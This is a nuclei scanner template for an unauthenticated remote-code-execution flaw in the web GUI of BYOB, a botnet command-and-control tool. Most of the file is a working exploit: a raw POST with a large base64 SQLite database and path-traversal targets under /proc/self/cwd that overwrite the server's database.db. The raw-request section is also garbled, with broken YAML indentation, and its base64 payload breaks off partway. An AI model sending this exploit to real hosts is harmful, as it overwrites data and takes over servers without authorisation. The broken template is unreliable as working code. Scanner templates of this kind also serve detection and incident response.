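id: malwared-byob-rce

info:
  name: Malwared BYOB - Unauthenticated Remote Code Execution
  author: pdteam
  severity: critical
  description: |
    The web GUI of BYOB (Build Your Own Botnet, malwaredllc/byob) exposes
    /api/file/add without authentication. This template POSTs a crafted SQLite
    database to that endpoint: the base64 `data` value decodes to a file with
    the "SQLite format 3" header and CREATE TABLE statements for tables named
    task, exfiltrated_file and payload, and it is written to one of the
    candidate `database.db` locations listed under payloads. The referenced
    write-up describes how control of that database leads to command execution
    on the C2 host.
    WARNING: this check is not passive. A successful run overwrites the
    target's database.db; use it only with explicit authorisation.
  impact: |
    An unauthenticated attacker can overwrite the BYOB server's database and,
    following the referenced chain, execute commands on the C2 host, taking
    control of the server.
  remediation: |
    Remove any instances of the Malwared - Build Your Own Botnet tool from the
    target system and conduct a thorough security audit. Because BYOB is a
    command-and-control framework, treat an exposed instance as an incident:
    preserve its database.db and web-server logs before removal, and review
    what the operator was controlling from it.
  reference:
  - https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/
  - https://github.com/chebuya/exploits/tree/main/BYOB-RCE
  - https://github.com/malwaredllc/byob
  metadata:
    verified: true
    # One fingerprint GET plus one POST per db_path candidate (6) = 7.
    max-request: 7
    # Quoted so the ':' and '="' inside the query strings are never re-parsed
    # by a YAML loader; the values themselves are unchanged.
    shodan-query: 'http.favicon.hash:487145192'
    fofa-query: 'icon_hash="487145192"'
  tags: rce,malware,byob,botnet,oss
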
# Request 1 is a fingerprint; request 2 (the database overwrite) is only sent
# when request 1 matched, so hosts that are not running BYOB are never written to.
flow: http(1) && http(2)

http:
# Fingerprint the BYOB web GUI landing page. `internal: true` keeps this match
# from being reported as a finding on its own; it only gates the second request.
- method: GET
  path:
  - "{{BaseURL}}"

  matchers:
  - type: word
    # `or` is the default for word matchers; any one string identifies BYOB.
    condition: or
    words:
    - "Build Your Own Botnet"
    - "Post-Exploitation Framework"
    - "malwaredllc/byob"
    internal: true

# The second request (below) is the destructive step: it POSTs a base64 SQLite
# database to /api/file/add, once per `db_path` candidate. The candidates go
# through /proc/self/cwd, i.e. they resolve relative to the server process's
# working directory and only work on Linux targets. A 200 response whose body
# echoes "buildyourownbotnet/database.db" is treated as success.
# NOTE(review): the three `instance/…` candidates do not contain that string,
# so they can only match if the server echoes a resolved path that does —
# confirm against a live response before relying on them.

- raw:
- |
POST /api/file/add HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
data=U1FMaXRlIGZvcm1hdCAzABAAAQEAQCAgAAAADAAAAAsAAAAAAAAAAAAAAAUAAAAEAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAC52iQ0P%2BAAKCD4ADvYPzwyRDscLJQxiCYgK5Ag%2BCV8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIeCQcXFRUBhB90YWJsZXRhc2t0YXNrCkNSRUFURSBUQUJMRSB0YXNrICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJdWlkIFZBUkNIQVIoMzIpIE5PVCBOVUxMLCAKCXRhc2sgVEVYVCwgCglyZXN1bHQgVEVYVCwgCglpc3N1ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJY29tcGxldGVkIERBVEVUSU1FLCAKCXNlc3Npb24gVkFSQ0hBUigzMikgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKHVpZCksIAoJRk9SRUlHTiBLRVkoc2Vzc2lvbikgUkVGRVJFTkNFUyBzZXNzaW9uICh1aWQpCiknCgYXOxUBAGluZGV4c3FsaXRlX2F1dG9pbmRleF90YXNrXzF0YXNrC4JZBwcXLS0BhGV0YWJsZWV4ZmlsdHJhdGVkX2ZpbGVleGZpbHRyYXRlZF9maWxlCENSRUFURSBUQUJMRSBleGZpbHRyYXRlZF9maWxlICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJZmlsZW5hbWUgVkFSQ0hBUigzNCkgTk9UIE5VTEwsIAoJc2Vzc2lvbiBWQVJDSEFSKDE1KSBOT1QgTlVMTCwgCgltb2R1bGUgVkFSQ0hBUigxNSkgTk9UIE5VTEwsIAoJY3JlYXRlZCBEQVRFVElNRSBOT1QgTlVMTCwgCglvd25lciBWQVJDSEFSKDEyMCkgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKGZpbGVuYW1lKSwgCglGT1JFSUdOIEtFWShvd25lcikgUkVGRVJFTkNFUyB1c2VyICh1c2VybmFtZSkKKT8IBhdTLQEAaW5kZXhzcWxpdGVfYXV0b2luZGV4X2V4ZmlsdHJhdGVkX2ZpbGVfMWV4ZmlsdHJhdGVkX2ZpbGUJgjoFBxcbGwGES3RhYmxlcGF5bG9hZHBheWxvYWQGQ1JFQVRFIFRBQkxFIHBheWxvYWQgKAoJaWQgSU5URUdFUiBOT1QgTlVMTCwgCglmaWxlbmFtZSBWQVJDSEFSKDM0KSBOT1QgTlVMTCwgCglvcGVyYXRpbmdfc3lzdGVtIFZBUkNIQVIoMyksIAo
JYXJjaGl0ZWN0dXJlIFZBUkNIQVIoMTQpLCAKCWNyZWF0ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJb3duZXIgVk
payloads:
db_path:
- /proc/self/cwd/buildyourownbotnet/database.db
- /proc/self/cwd/../buildyourownbotnet/database.db
- /proc/self/cwd/../../../../buildyourownbotnet/database.db
- /proc/self/cwd/instance/database.db
- /proc/self/cwd/../../../../instance/database.db
- /proc/self/cwd/../instance/database.db
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "buildyourownbotnet/database.db"
# NOTE(review): the digest below is nuclei's template signature for the
# upstream file. Any edit to this template — including reformatting or added
# comments — invalidates it; re-sign the template (nuclei's `-sign` flag) after
# changing it, or it will no longer verify as signed.
# digest: 490a0046304402201273e8c79b6c6ee800aef79e70551f99097ad44f4b7e521efc509b04fd9d431c02206bffadd496403236e17956f53119014326ef1bf32030095b0feeec21774545bd:922c64590222798bb761d5b6d8e72950